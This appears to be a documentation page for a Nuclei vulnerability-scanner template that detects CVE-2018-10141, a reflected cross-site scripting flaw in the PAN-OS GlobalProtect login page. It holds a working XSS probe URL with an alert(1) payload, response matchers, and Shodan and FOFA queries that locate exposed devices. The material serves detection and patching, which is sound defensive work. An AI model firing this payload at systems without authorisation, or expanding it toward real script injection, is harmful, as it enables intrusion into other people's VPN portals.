Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting
ID: CVE-2018-10141
Severity: medium
Author: dhiyaneshDk
Tags: cve,cve2018,panos,vpn,globalprotect,xss,paloaltonetworks
Description
Section titled “Description”Palo Alto Networks PAN-OS before 8.1.4 GlobalProtect Portal Login page allows an unauthenticated attacker to inject arbitrary JavaScript or HTML, making it vulnerable to cross-site scripting.
YAML Source
Section titled “YAML Source”id: CVE-2018-10141
info: name: Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting author: dhiyaneshDk severity: medium description: Palo Alto Networks PAN-OS before 8.1.4 GlobalProtect Portal Login page allows an unauthenticated attacker to inject arbitrary JavaScript or HTML, making it vulnerable to cross-site scripting. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities. remediation: | Upgrade to Palo Alto Networks PAN-OS GlobalProtect VPN client version 8.1.4 or later to mitigate this vulnerability. reference: - https://security.paloaltonetworks.com/CVE-2018-10141 - https://nvd.nist.gov/vuln/detail/CVE-2018-10141 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/Elsfa7-110/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-10141 cwe-id: CWE-79 epss-score: 0.00126 epss-percentile: 0.47275 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: paloaltonetworks product: pan-os shodan-query: - http.favicon.hash:"-631559155" - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" fofa-query: icon_hash="-631559155" tags: cve,cve2018,panos,vpn,globalprotect,xss,paloaltonetworks
http: - method: GET path: - '{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x'
matchers-condition: and matchers: - type: word part: body words: - 'var valueUser = "j";-alert(1)-"x";'
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 490a0046304402206ebd782f4b1ae72769e5f7a75881c018143f98b9fc6b900f90b5412f163d20d402205741c0b9f10df465b2662cbd48ff8ff1b6b74a38bc8e192dcb53bc56686053a0:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-10141.yaml"